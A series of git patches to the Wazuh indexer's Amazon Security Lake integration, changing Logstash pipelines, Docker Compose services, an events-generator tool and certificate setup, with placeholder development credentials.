diff --git a/integrations/amazon-security-lake/README.md b/integrations/amazon-security-lake/README.md
index 46eee1b92a4b0..1dbe1dd4ebb23 100644
--- a/integrations/amazon-security-lake/README.md
+++ b/integrations/amazon-security-lake/README.md
@@ -46,4 +46,17 @@ sudo -E /usr/share/logstash/bin/logstash -f /etc/logstash/conf.d/wazuh-s3.conf -
 # Start Logstash
 sudo systemctl enable logstash
 sudo systemctl start logstash
-```
\ No newline at end of file
+```
+
+
+### Building the Docker image
+
+```console
+docker build -t wazuh/indexer-security-lake-integration:latest . --progress=plain
+```
+
+
+Run with: 
+```console
+docker run -it --name=wazuh-indexer-security-lake-integration --rm wazuh/indexer-security-lake-integration ls
+```
diff --git a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-file.conf b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-file.conf
new file mode 100644
index 0000000000000..e3fa60a785372
--- /dev/null
+++ b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-file.conf
@@ -0,0 +1,26 @@
+input {
+   opensearch {
+      hosts =>  ["opensearch-node:9200"]
+      user  =>  "${INDEXER_USERNAME}"
+      password  =>  "${INDEXER_PASSWORD}"
+      ssl => false
+      index =>  "wazuh-alerts-4.x-*"
+      query =>  '{
+            "query": {
+               "range": {
+                  "@timestamp": {
+                     "gt": "now-1m"
+                  }
+               }
+            }
+      }'
+      target => "_source"
+      schedule => "* * * * *"
+   }
+}
+
+output {
+   file {
+      path => "/usr/share/logstash/pipeline/indexer-to-file.json"
+   }
+}
diff --git a/integrations/amazon-security-lake/logstash/pipeline/pipe-output.conf b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf
similarity index 100%
rename from integrations/amazon-security-lake/logstash/pipeline/pipe-output.conf
rename to integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf
diff --git a/integrations/amazon-security-lake/logstash/pipeline/wazuh-s3.conf b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-s3.conf
similarity index 100%
rename from integrations/amazon-security-lake/logstash/pipeline/wazuh-s3.conf
rename to integrations/amazon-security-lake/logstash/pipeline/indexer-to-s3.conf
diff --git a/integrations/amazon-security-lake/logstash/setup.sh b/integrations/amazon-security-lake/logstash/setup.sh
index 2b1fc109f401a..9527f1fa58362 100644
--- a/integrations/amazon-security-lake/logstash/setup.sh
+++ b/integrations/amazon-security-lake/logstash/setup.sh
@@ -4,12 +4,7 @@
 # indexer's credentials. NOTE: works only for dockerized logstash.
 #   Source: https://www.elastic.co/guide/en/logstash/current/keystore.html
 
-# Prepare keystore
-set +o history
-export LOGSTASH_KEYSTORE_PASS="SecretPassword"
-set -o history
-
 # Create keystore
-/usr/share/logstash/bin/logstash-keystore create
-echo "admin" | /usr/share/logstash/bin/logstash-keystore add INDEXER_USERNAME
-echo "admin" | /usr/share/logstash/bin/logstash-keystore add INDEXER_PASSWORD
+/usr/share/logstash/bin/logstash-keystore create --path.settings /etc/logstash
+echo "admin" | /usr/share/logstash/bin/logstash-keystore add INDEXER_USERNAME --path.settings /etc/logstash
+echo "admin" | /usr/share/logstash/bin/logstash-keystore add INDEXER_PASSWORD --path.settings /etc/logstash
diff --git a/integrations/amazon-security-lake/run.py b/integrations/amazon-security-lake/run.py
index d8234226bf98e..515d1d97610f9 100644
--- a/integrations/amazon-security-lake/run.py
+++ b/integrations/amazon-security-lake/run.py
@@ -1,3 +1,5 @@
+#!/env/bin/python3.9
+
 import transform
 import json
 
diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py
index ab399f58b7b9a..4aa650b158c54 100755
--- a/integrations/amazon-security-lake/stdin_to_securitylake.py
+++ b/integrations/amazon-security-lake/stdin_to_securitylake.py
@@ -1,4 +1,4 @@
-#!/home/fede/src/wazuh-indexer/integrations/amazon-security-lake/venv/bin/python3
+#!/env/bin/python3.9
 
 import os
 import sys
diff --git a/integrations/amazon-security-lake/docker-compose.yml b/integrations/docker/amazon-security-lake.yml
similarity index 69%
rename from integrations/amazon-security-lake/docker-compose.yml
rename to integrations/docker/amazon-security-lake.yml
index 6c5c1c21445c9..67effe4deed55 100644
--- a/integrations/amazon-security-lake/docker-compose.yml
+++ b/integrations/docker/amazon-security-lake.yml
@@ -1,5 +1,18 @@
 version: '3'
+name: "amazon-security-lake"
 services:
+  events-generator:
+    image: wazuh/indexer-events-generator
+    build:
+      context: ../tools/events-generator
+    container_name: events-generator
+    depends_on:
+      - opensearch-node
+    networks:
+      - opensearch-net
+    # TODO add healthcheck to indexer's service to avoid sending requests before API is ready.
+    command: bash -c "sleep 10 && echo 'Ey, wake up!' && python run.py -a opensearch-node"
+
   opensearch-node:
     image: opensearchproject/opensearch:latest # This should be the same image used for opensearch-node1 to avoid issues
     container_name: opensearch-node
@@ -21,6 +34,7 @@ services:
       - opensearch-data:/usr/share/opensearch/data
     networks:
       - opensearch-net
+
   opensearch-dashboards:
     image: opensearchproject/opensearch-dashboards:latest # Make sure the version of opensearch-dashboards matches the version of opensearch installed on other nodes
     container_name: opensearch-dashboards
@@ -33,16 +47,9 @@ services:
     networks:
       - opensearch-net
   logstash:
+    image: wazuh/indexer-security-lake-integration
     build:
-      context: .
-      dockerfile_inline: |
-        FROM logstash:8.12.1
-
-        COPY --chown=logstash:logstash logstash/setup.sh /usr/share/logstash/bin/setup.sh
-        COPY --chown=logstash:logstash logstash/pipeline/pipe-output.conf /usr/share/logstash/pipeline/pipe-output.config
-       
-        RUN bash /usr/share/logstash/bin/setup.sh
-        RUN /usr/share/logstash/bin/logstash-plugin install logstash-input-opensearch
+      context: ../amazon-security-lake
     container_name: logstash
     environment:
       LOG_LEVEL: trace
@@ -53,12 +60,14 @@ services:
       - "5000:5000/udp"
       - "5044:5044"
       - "9600:9600"
+    volumes:
+      - ../amazon-security-lake/logstash/pipeline:/usr/share/logstash/pipeline
     depends_on:
       - opensearch-node
     networks:
       - opensearch-net
     command: tail -f /dev/null
-    # command: logstash -f /usr/share/logstash/pipeline/pipe-output.config
+    # command: /usr/share/logstash/bin/logstash -f /usr/share/logstash/pipeline/indexer-to-integrator.config --path.settings /etc/logstash
 
 volumes:
   opensearch-data:
diff --git a/integrations/tools/events-generator/.dockerignore b/integrations/tools/events-generator/.dockerignore
new file mode 100644
index 0000000000000..0f028b576338e
--- /dev/null
+++ b/integrations/tools/events-generator/.dockerignore
@@ -0,0 +1,2 @@
+.venv
+Dockerfile
\ No newline at end of file
diff --git a/integrations/tools/events-generator/Dockerfile b/integrations/tools/events-generator/Dockerfile
new file mode 100644
index 0000000000000..da32f8c042017
--- /dev/null
+++ b/integrations/tools/events-generator/Dockerfile
@@ -0,0 +1,4 @@
+FROM python:3.9
+COPY . /home/events-generator/
+WORKDIR /home/events-generator
+RUN pip install -r requirements.txt
\ No newline at end of file
diff --git a/integrations/tools/events-generator/README.md b/integrations/tools/events-generator/README.md
index b11988192929e..ed8e53ea8acd9 100644
--- a/integrations/tools/events-generator/README.md
+++ b/integrations/tools/events-generator/README.md
@@ -41,3 +41,14 @@ INFO:event_generator:Event created
 INFO:event_generator:Event created
 {'_index': 'wazuh-alerts-4.x-2024.02.13-000001', '_id': 'eRWno40BZRXLJU5t4u66', '_version': 1, 'result': 'created', '_shards': {'total': 2, 'successful': 2, 'failed': 0}, '_seq_no': 172, '_primary_term': 1}
 ```
+
+### Building the Docker image
+
+```console
+docker build -t wazuh/indexer-events-generator:latest .
+```
+
+Run with: 
+```console
+docker run -it --name=wazuh-indexer-events-generator --rm wazuh/indexer-events-generator python run.py -h
+```
\ No newline at end of file
diff --git a/integrations/tools/events-generator/run.py b/integrations/tools/events-generator/run.py
index 3a6a4aeba9fc0..9b56f6969c505 100644
--- a/integrations/tools/events-generator/run.py
+++ b/integrations/tools/events-generator/run.py
@@ -1,4 +1,4 @@
-#!/usr/bin/pyton
+#!/usr/bin/python3
 
 # Events generator tool for Wazuh's indices.
 # Chooses a random element from <index>/alerts.json to index
@@ -136,6 +136,11 @@ def parse_args():
     parser = argparse.ArgumentParser(
         description="Events generator tool for Wazuh's indices. Indexes a random element from <index>/alerts.json",
     )
+    parser.add_argument(
+        '-i', '--index',
+        default="wazuh-alerts-4.x-sample",
+        help="Destination index name or alias"
+    )
     parser.add_argument(
         '-o', '--output',
         choices=['indexer', 'filebeat'],
@@ -143,9 +148,9 @@ def parse_args():
         help="Destination of the events. Default: indexer."
     )
     parser.add_argument(
-        '-i', '--index',
+        '-m', '--module',
         default="wazuh-alerts",
-        help="Index name or module (e.g: wazuh-alerts, wazuh-states-vulnerabilities)"
+        help="Wazuh module to read the alerts from (e.g: wazuh-alerts, wazuh-states-vulnerabilities). Must match a subfolder's name."
     )
     # Infinite loop by default
     parser.add_argument(
@@ -189,7 +194,7 @@ def parse_args():
 
 
 def main(args: dict):
-    inventory = Inventory(f"{args['index']}/alerts.json")
+    inventory = Inventory(f"{args['module']}/alerts.json")
     logger.info("Inventory created")
     publisher = PublisherCreator.create(args["output"], args)
     logger.info("Publisher created")

From 17f47caec1e9db250585e01878ae4a0a62657f43 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=C3=81lex=20Ruiz?= <alejandro.ruiz.becerra@wazuh.com>
Date: Thu, 22 Feb 2024 15:58:02 +0100
Subject: [PATCH 26/34] Fix events-generator's Inventory starvation

---
 integrations/tools/events-generator/run.py | 6 ++++--
 1 file changed, 4 insertions(+), 2 deletions(-)

diff --git a/integrations/tools/events-generator/run.py b/integrations/tools/events-generator/run.py
index 9b56f6969c505..ec4ded0010c76 100644
--- a/integrations/tools/events-generator/run.py
+++ b/integrations/tools/events-generator/run.py
@@ -42,9 +42,11 @@ def __init__(self, path: str):
             self.size = len(self.elements)
 
     def get_random(self) -> str:
+        """
+        Returns the last element of the list
+        """
         random.shuffle(self.elements)
-        return self.elements.pop()
-        # return self.elements[random.randint(0, self.size)]
+        return self.elements[self.size-1]
 
 # ================================================== #
 

From 204948fdad9f77095e625a8278e06c212b26f2f0 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=C3=81lex=20Ruiz?= <alejandro.ruiz.becerra@wazuh.com>
Date: Thu, 22 Feb 2024 16:08:30 +0100
Subject: [PATCH 27/34] Remove files present in #147

---
 .../stdin_to_securitylake.py                  |  91 --------------
 .../transform/legacy/legacy_converter.py      |  87 -------------
 .../transform/legacy/legacy_test.py           |  15 ---
 integrations/docker/docker-compose.yml        | 117 ------------------
 4 files changed, 310 deletions(-)
 delete mode 100755 integrations/amazon-security-lake/stdin_to_securitylake.py
 delete mode 100644 integrations/amazon-security-lake/transform/legacy/legacy_converter.py
 delete mode 100644 integrations/amazon-security-lake/transform/legacy/legacy_test.py
 delete mode 100644 integrations/docker/docker-compose.yml

diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py
deleted file mode 100755
index 4aa650b158c54..0000000000000
--- a/integrations/amazon-security-lake/stdin_to_securitylake.py
+++ /dev/null
@@ -1,91 +0,0 @@
-#!/env/bin/python3.9
-
-import os
-import sys
-import argparse
-import logging
-import time
-import json
-import datetime
-from pyarrow import parquet, Table, fs
-
-from transform import converter
-
-block_ending = { "block_ending": True }
-
-def encode_parquet(list,foldername,filename):
-  try:
-    table = Table.from_pylist(list)
-    parquet.write_table(table, '{}/{}.parquet'.format(foldername,filename))
-  except Exception as e:
-    logging.error(e)
-    raise
-
-def map_block(fileobject, length):
-  output=[]
-  ocsf_mapped_alert = {}
-  for line in range(0, length):
-    line = fileobject.readline()
-    if line == '':
-      output.append(block_ending)
-      break 
-    alert = json.loads(line)
-    ocsf_mapped_alert = converter.convert(alert)
-    output.append(ocsf_mapped_alert)
-  return output
-
-def get_elapsedseconds(reference_timestamp):
-  current_time = datetime.datetime.now(datetime.timezone.utc)  
-  return (current_time - reference_timestamp).total_seconds()
-
-if __name__ == "__main__":
-  date = datetime.datetime.now(datetime.timezone.utc).strftime('%F_%H.%M.%S')
-  parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline')
-  parser.add_argument('-d','--debug', action='store_true', help='Activate debugging')
-  parser.add_argument('-i','--pushinterval', type=int, action='store', default=299, help='Time interval in seconds for pushing data to Security Lake')
-  parser.add_argument('-l','--logoutput', type=str, default="/tmp/stdintosecuritylake.txt", help='File path of the destination file to write to')
-  parser.add_argument('-m','--maxlength', type=int, action='store', default=2000, help='Event number threshold for submission to Security Lake')
-  parser.add_argument('-n','--linebuffer', type=int, action='store', default=100, help='stdin line buffer length')
-  parser.add_argument('-o','--outputfolder', type=str, action='store', help='Folder or S3 bucket URL to dump parquet files to')
-  parser.add_argument('-s','--sleeptime', type=int, action='store', default=5, help='Input buffer polling interval')
-  args = parser.parse_args()
-  #logging.basicConfig(format='%(asctime)s %(message)s', filename=args.logoutput, encoding='utf-8', level=logging.DEBUG)
-  logging.basicConfig(format='%(asctime)s %(message)s', encoding='utf-8', level=logging.DEBUG)
-  logging.info('BUFFERING STDIN')
-  
-  try: 
-
-    with os.fdopen(sys.stdin.fileno(), 'rt') as stdin:
-      output_buffer = []
-      starttimestamp = datetime.datetime.now(datetime.timezone.utc)
-      
-      try:
-        while True:
-
-          current_block = map_block( stdin, args.linebuffer )
-
-          if current_block[-1] == block_ending:
-            output_buffer +=  current_block[0:-1]
-            time.sleep(args.sleeptime)
-          else:
-            output_buffer +=  current_block
-
-          if len(output_buffer) == 0:
-            continue
-
-          if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval:
-            logging.info('Writing data to parquet file')
-            encode_parquet(output_buffer,args.outputfolder,'wazuh-{}'.format(date))
-            starttimestamp = datetime.datetime.now(datetime.timezone.utc)
-            output_buffer = []
-
-      except KeyboardInterrupt:
-        logging.info("Keyboard Interrupt issued")
-        exit(0)
-
-    logging.info('FINISHED RETRIEVING STDIN')
-
-  except Exception as e:
-    logging.error("Error running script")
-    logging.error(e)
-    raise
diff --git a/integrations/amazon-security-lake/transform/legacy/legacy_converter.py b/integrations/amazon-security-lake/transform/legacy/legacy_converter.py
deleted file mode 100644
index 2a14b75957c97..0000000000000
--- a/integrations/amazon-security-lake/transform/legacy/legacy_converter.py
+++ /dev/null
@@ -1,87 +0,0 @@
-#!/usr/bin/python
-
-# event comes from Filebeat
-event = {}
-
-
-def normalize(level: int) -> int:
-    """
-    Normalizes rule level into the 0-6 range, required by OCSF.
-    """
-    # TODO normalization
-    return level
-
-
-def join(iterable, separator=","):
-    return (separator.join(iterable))
-
-
-def convert(event: dict) -> dict:
-    """
-    Converts Wazuh events to OCSF's Detecting Finding (2004) class.
-    """
-    ocsf_class_template = \
-        {
-            "activity_id": 1,
-            "category_name": "Findings",
-            "category_uid": 2,
-            "class_name": "Detection Finding",
-            "class_uid": 2004,
-            "count": event["rule"]["firedtimes"],
-            "message": event["rule"]["description"],
-            "finding_info": {
-                "analytic": {
-                    "category": join(event["rule"]["groups"]),
-                    "name": event["decoder"]["name"],
-                    "type_id": 1,
-                    "uid": event["rule"]["id"],
-                },
-                "attacks": {
-                    "tactic": {
-                        "name": join(event["rule"]["mitre"]["tactic"]),
-                    },
-                    "technique": {
-                        "name": join(event["rule"]["mitre"]["technique"]),
-                        "uid": join(event["rule"]["mitre"]["id"]),
-                    },
-                    "version": "v13.1"
-                },
-                "title": event["rule"]["description"],
-                "types": [
-                    event["input"]["type"]
-                ],
-                "uid": event['id']
-            },
-            "metadata": {
-                "log_name": "Security events",
-                "log_provider": "Wazuh",
-                "product": {
-                    "name": "Wazuh",
-                    "lang": "en",
-                    "vendor_name": "Wazuh, Inc,."
-                },
-                "version": "1.1.0",
-            },
-            "raw_data": event["full_log"],
-            "resources": [
-                {
-                    "name": event["agent"]["name"],
-                    "uid": event["agent"]["id"]
-                },
-            ],
-            "risk_score": event["rule"]["level"],
-            "severity_id": normalize(event["rule"]["level"]),
-            "status_id": 99,
-            "time": event["timestamp"],
-            "type_uid": 200401,
-            "unmapped": {
-                "data_sources": [
-                    event["_index"],
-                    event["location"],
-                    event["manager"]["name"]
-                ],
-                "nist": event["rule"]["nist_800_53"],  # Array
-            }
-        }
-
-    return ocsf_class_template
diff --git a/integrations/amazon-security-lake/transform/legacy/legacy_test.py b/integrations/amazon-security-lake/transform/legacy/legacy_test.py
deleted file mode 100644
index ebcb8fa4b2e90..0000000000000
--- a/integrations/amazon-security-lake/transform/legacy/legacy_test.py
+++ /dev/null
@@ -1,15 +0,0 @@
-#!/usr/bin/python
-
-from transform.legacy.converter import convert
-import json
-
-converted_event = {}
-with open("../wazuh-event.sample.json", "r") as fd:
-    sample_event = json.load(fd)
-    # print(json.dumps(sample_event, indent=4))
-    converted_event = convert(sample_event)
-
-if converted_event:
-    with open("../wazuh-event.ocsf.json", "w") as fd:
-        json.dump(converted_event, fd)
-        print("Done")
diff --git a/integrations/docker/docker-compose.yml b/integrations/docker/docker-compose.yml
deleted file mode 100644
index dd7f12f119e05..0000000000000
--- a/integrations/docker/docker-compose.yml
+++ /dev/null
@@ -1,117 +0,0 @@
-version: "3.8"
-
-services:
-
-  events-generator:
-    image: events-generator
-    build:
-      dockerfile_inline: |
-        FROM ubuntu:20.04
-        RUN apt update && apt install -y python3-requests
-    container_name: events-generator
-    volumes:
-      - ../tools/events-generator:/home/events-generator
-    hostname: events-generator
-    working_dir: "/home/events-generator"
-    entrypoint: sh -c "python3 run.py"
-    networks:
-      wazuh-indexer-dev:
-        aliases:
-          - events-generator
-        ipv4_address: 172.18.0.2
-    depends_on:
-      - wazuh-indexer
-  
-  wazuh-indexer:
-    image: wazuh/wazuh-indexer:4.8.0-beta1
-    container_name: wazuh-indexer
-    hostname: wazuh-indexer
-    restart: always
-    networks:
-      wazuh-indexer-dev:
-        aliases:
-          - wazuh-indexer
-        ipv4_address: 172.18.0.3
-    ports:
-      - "9222:9200"
-    depends_on:
-      - generator
-    environment:
-      - "OPENSEARCH_JAVA_OPTS=-Xms1g -Xmx1g"
-      - "bootstrap.memory_lock=true"
-      - 'INDEXER_PASSWORD=SecretPassword'
-    ulimits:
-      memlock:
-        soft: -1
-        hard: -1
-      nofile:
-        soft: 65536
-        hard: 65536
-    volumes:
-      - ./wazuh-indexer-data:/var/lib/wazuh-indexer
-      - ./config/wazuh_indexer_ssl_certs/root-ca.pem:/usr/share/wazuh-indexer/certs/root-ca.pem
-      - ./config/wazuh_indexer_ssl_certs/wazuh1.indexer-key.pem:/usr/share/wazuh-indexer/certs/wazuh1.indexer.key
-      - ./config/wazuh_indexer_ssl_certs/wazuh1.indexer.pem:/usr/share/wazuh-indexer/certs/wazuh1.indexer.pem
-      - ./config/wazuh_indexer_ssl_certs/admin.pem:/usr/share/wazuh-indexer/certs/admin.pem
-      - ./config/wazuh_indexer_ssl_certs/admin-key.pem:/usr/share/wazuh-indexer/certs/admin-key.pem
-      - ./config/wazuh_indexer/wazuh1.indexer.yml:/usr/share/wazuh-indexer/opensearch.yml
-      - ./config/wazuh_indexer/internal_users.yml:/usr/share/wazuh-indexer/opensearch-security/internal_users.yml
-
-  generator:
-    image: wazuh/wazuh-certs-generator:0.0.1
-    hostname: wazuh-certs-generator
-    volumes:
-      - ./config/wazuh_indexer_ssl_certs/:/certificates/
-      - ./config/certs.yml:/config/certs.yml
-    environment:
-      - HTTP_PROXY=YOUR_PROXY_ADDRESS_OR_DNS
-  
-  logstash:
-    image: logstash
-    build:
-      dockerfile_inline: |
-        FROM ubuntu:20.04
-        RUN apt update && apt install -y iputils-ping wget gpg apt-transport-https
-        WORKDIR /home/logstash
-        RUN wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | gpg --dearmor -o /usr/share/keyrings/elastic-keyring.gpg && \
-            echo "deb [signed-by=/usr/share/keyrings/elastic-keyring.gpg] https://artifacts.elastic.co/packages/8.x/apt stable main" | tee -a /etc/apt/sources.list.d/elastic-8.x.list && \
-            apt update && \
-            apt install -y logstash && \
-            chown -R logstash:logstash /etc/logstash && \
-            chown logstash:logstash /home/logstash
-    entrypoint: /usr/share/bin/logstash --path.settings /etc/logstash --config.reload.automatic
-    container_name: logstash
-    hostname: logstash
-    user: logstash
-    volumes:
-      - ../amazon-security-lake:/home/logstash
-      - ../amazon-security-lake/logstash/pipe-output.conf:/etc/logstash/conf.d/pipe-output.conf
-      - ../amazon-security-lake/logstash/pipelines.yml:/etc/logstash/pipelines.yml
-    networks:
-      wazuh-indexer-dev:
-        aliases:
-          - logstash
-        ipv4_address: 172.18.0.4
-    depends_on:
-      - wazuh-indexer
-      - s3-ninja
-  
-  s3-ninja:
-    image: scireum/s3-ninja
-    container_name: s3-ninja
-    hostname: s3-ninja
-    volumes:
-      - ./s3-ninja_data:/home/sirius/data
-    networks:
-      wazuh-indexer-dev:
-        aliases:
-          - s3-ninja
-        ipv4_address: 172.18.0.5
-    ports:
-      - "9444:9000"
-
-networks:
-  wazuh-indexer-dev:
-    ipam:
-      config:
-        - subnet: "172.18.0.0/16"

From 5fcc9a394a339f373a5a7a557bc302b7efcfc42e Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=C3=81lex=20Ruiz?= <alejandro.ruiz.becerra@wazuh.com>
Date: Thu, 22 Feb 2024 16:19:33 +0100
Subject: [PATCH 28/34] Cleanup

---
 integrations/amazon-security-lake/run.py | 10 ----------
 1 file changed, 10 deletions(-)

diff --git a/integrations/amazon-security-lake/run.py b/integrations/amazon-security-lake/run.py
index 515d1d97610f9..c26adffa2ea0f 100644
--- a/integrations/amazon-security-lake/run.py
+++ b/integrations/amazon-security-lake/run.py
@@ -17,19 +17,9 @@ def _test():
             print("--")
             print("")
             print(ocsf_event)
-        #     event = Event.model_validate_json(json.dumps(event))
-        #     print(event)
-        #     ocsf_event = to_detection_finding(event)
 
         except KeyError as e:
             raise (e)
-        # except ValidationError as e:
-        #     print(e)
-
-        # if ocsf_event:
-        #     with open("wazuh-event.ocsf.json", "w") as fd:
-        #         json.dump(ocsf_event.model_dump(), fd)
-        #         print(ocsf_event.model_dump())
 
 
 if __name__ == '__main__':

From a2464104dfcddfb28f4376d12a38bd1cc07ac3e1 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=C3=81lex=20Ruiz?= <alejandro.ruiz.becerra@wazuh.com>
Date: Thu, 22 Feb 2024 18:06:09 +0100
Subject: [PATCH 29/34] Add FQDN hostnames to services for certificates
 creation

---
 integrations/docker/amazon-security-lake.yml | 49 +++++++++++---------
 1 file changed, 26 insertions(+), 23 deletions(-)

diff --git a/integrations/docker/amazon-security-lake.yml b/integrations/docker/amazon-security-lake.yml
index 67effe4deed55..5c2b09d133089 100644
--- a/integrations/docker/amazon-security-lake.yml
+++ b/integrations/docker/amazon-security-lake.yml
@@ -7,20 +7,21 @@ services:
       context: ../tools/events-generator
     container_name: events-generator
     depends_on:
-      - opensearch-node
+      - wazuh.indexer
     networks:
-      - opensearch-net
+      - net
     # TODO add healthcheck to indexer's service to avoid sending requests before API is ready.
-    command: bash -c "sleep 10 && echo 'Ey, wake up!' && python run.py -a opensearch-node"
+    command: bash -c "sleep 10 && echo 'Ey, wake up!' && python run.py -a wazuh.indexer"
 
-  opensearch-node:
-    image: opensearchproject/opensearch:latest # This should be the same image used for opensearch-node1 to avoid issues
-    container_name: opensearch-node
+  wazuh.indexer:
+    image: opensearchproject/opensearch:latest
+    container_name: wazuh.indexer
+    hostname: wazuh.indexer
     environment:
-      - cluster.name=opensearch-cluster
-      - node.name=opensearch-node
-      - discovery.seed_hosts=opensearch-node
-      - cluster.initial_cluster_manager_nodes=opensearch-node
+      # - cluster.name=opensearch-cluster
+      - node.name=wazuh.indexer
+      - discovery.type=single-node
+      # - cluster.initial_cluster_manager_nodes=opensearch-node
       - bootstrap.memory_lock=true
       - "OPENSEARCH_JAVA_OPTS=-Xms512m -Xmx512m"
     ulimits:
@@ -31,26 +32,28 @@ services:
         soft: 65536
         hard: 65536
     volumes:
-      - opensearch-data:/usr/share/opensearch/data
+      - data:/usr/share/opensearch/data
     networks:
-      - opensearch-net
+      - net
 
-  opensearch-dashboards:
+  wazuh.dashboard:
     image: opensearchproject/opensearch-dashboards:latest # Make sure the version of opensearch-dashboards matches the version of opensearch installed on other nodes
-    container_name: opensearch-dashboards
+    container_name: wazuh.dashboard
+    hostname: wazuh.dashboard
     ports:
       - 5601:5601 # Map host port 5601 to container port 5601
     expose:
       - "5601" # Expose port 5601 for web access to OpenSearch Dashboards
     environment:
-      OPENSEARCH_HOSTS: '["https://opensearch-node:9200"]' # Define the OpenSearch nodes that OpenSearch Dashboards will query
+      OPENSEARCH_HOSTS: '["https://wazuh.indexer:9200"]' # Define the OpenSearch nodes that OpenSearch Dashboards will query
     networks:
-      - opensearch-net
-  logstash:
+      - net
+  wazuh.integration.security.lake:
     image: wazuh/indexer-security-lake-integration
     build:
       context: ../amazon-security-lake
-    container_name: logstash
+    container_name: wazuh.integration.security.lake
+    hostname: wazuh.integration.security.lake
     environment:
       LOG_LEVEL: trace
       LOGSTASH_KEYSTORE_PASS: "SecretPassword"
@@ -63,14 +66,14 @@ services:
     volumes:
       - ../amazon-security-lake/logstash/pipeline:/usr/share/logstash/pipeline
     depends_on:
-      - opensearch-node
+      - wazuh.indexer
     networks:
-      - opensearch-net
+      - net
     command: tail -f /dev/null
-    # command: /usr/share/logstash/bin/logstash -f /usr/share/logstash/pipeline/indexer-to-integrator.config --path.settings /etc/logstash
+    # command: /usr/share/logstash/bin/logstash -f /usr/share/logstash/pipeline/indexer-to-integrator.conf --path.settings /etc/logstash
 
 volumes:
-  opensearch-data:
+  data:
 
 networks:
-  opensearch-net:
\ No newline at end of file
+  net:
\ No newline at end of file

From b72d2b5eaf38c7753ebe5f4e96e16620aac9d5fe Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=C3=81lex=20Ruiz?= <alejandro.ruiz.becerra@wazuh.com>
Date: Thu, 29 Feb 2024 16:29:43 +0100
Subject: [PATCH 30/34] Add S3 Ninja (Mock) (#165)

---
 integrations/docker/amazon-security-lake.yml | 15 +++++++++++++++
 1 file changed, 15 insertions(+)

diff --git a/integrations/docker/amazon-security-lake.yml b/integrations/docker/amazon-security-lake.yml
index 5c2b09d133089..d44598029eb0f 100644
--- a/integrations/docker/amazon-security-lake.yml
+++ b/integrations/docker/amazon-security-lake.yml
@@ -48,6 +48,7 @@ services:
       OPENSEARCH_HOSTS: '["https://wazuh.indexer:9200"]' # Define the OpenSearch nodes that OpenSearch Dashboards will query
     networks:
       - net
+  
   wazuh.integration.security.lake:
     image: wazuh/indexer-security-lake-integration
     build:
@@ -58,6 +59,8 @@ services:
       LOG_LEVEL: trace
       LOGSTASH_KEYSTORE_PASS: "SecretPassword"
       MONITORING_ENABLED: false
+      AWS_KEY: "AKIAIOSFODNN7EXAMPLE"
+      AWS_SECRET: "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
     ports:
       - "5000:5000/tcp"
       - "5000:5000/udp"
@@ -72,8 +75,20 @@ services:
     command: tail -f /dev/null
     # command: /usr/share/logstash/bin/logstash -f /usr/share/logstash/pipeline/indexer-to-integrator.conf --path.settings /etc/logstash
 
+  s3.ninja:
+    image: scireum/s3-ninja:latest
+    container_name: s3.ninja
+    hostname: s3.ninja
+    ports:
+      - "9444:9000"
+    volumes:
+      - s3-data:/home/sirius/data
+    networks:
+      - net
+
 volumes:
   data:
+  s3-data:
 
 networks:
   net:
\ No newline at end of file

From 90cb9abe7525a3ac51217745c83b94236294c0f4 Mon Sep 17 00:00:00 2001
From: Federico Gustavo Galland <99492720+f-galland@users.noreply.github.com>
Date: Thu, 29 Feb 2024 13:10:58 -0300
Subject: [PATCH 31/34] Setup certificates in Wazuh Indexer and Logstash
 containers (#166)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

* Add certificate generator service

* Add certificate config to docker compose file

* Use secrets for certificates

* Disable permission handling inside cert's generator entrypoint.sh

* Back to using a bind mount for certs

* Have entrypoint.sh generate certs with 1000:1000 ownership

* Correct certificate permissions and bind mounting

* Add security initialization variable to compose file

* Fix permissions on certs generator entrypoint

* Add cert generator config file

* Remove old cert generator dir

* Set indexer hostname right in pipeline file

* Roll back commented code

---------

Signed-off-by: Álex Ruiz <alejandro.ruiz.becerra@wazuh.com>
Co-authored-by: Álex Ruiz <alejandro.ruiz.becerra@wazuh.com>
---
 integrations/.gitignore                       |  3 +-
 .../pipeline/indexer-to-integrator.conf       | 22 +++---
 integrations/docker/amazon-security-lake.yml  | 69 ++++++++++++-------
 integrations/docker/config/certs.yml          | 16 +++++
 4 files changed, 72 insertions(+), 38 deletions(-)
 create mode 100644 integrations/docker/config/certs.yml

diff --git a/integrations/.gitignore b/integrations/.gitignore
index 8f10b6459740c..ee1a01f52633d 100644
--- a/integrations/.gitignore
+++ b/integrations/.gitignore
@@ -2,4 +2,5 @@ elastic
 opensearch
 splunk
 common
-config
\ No newline at end of file
+config
+docker/certs
\ No newline at end of file
diff --git a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf
index 0cc7a7d089ec3..2f70beebbfaaa 100644
--- a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf
+++ b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf
@@ -1,9 +1,10 @@
 input {
    opensearch {
-      hosts =>  ["opensearch-node:9200"]
+      hosts =>  ["wazuh.indexer:9200"]
       user  =>  "${INDEXER_USERNAME}"
       password  =>  "${INDEXER_PASSWORD}"
-      ssl => false
+      ssl => true
+      ca_file => "/usr/share/logstash/root-ca.pem"
       index =>  "wazuh-alerts-4.x-*"
       query =>  '{
             "query": {
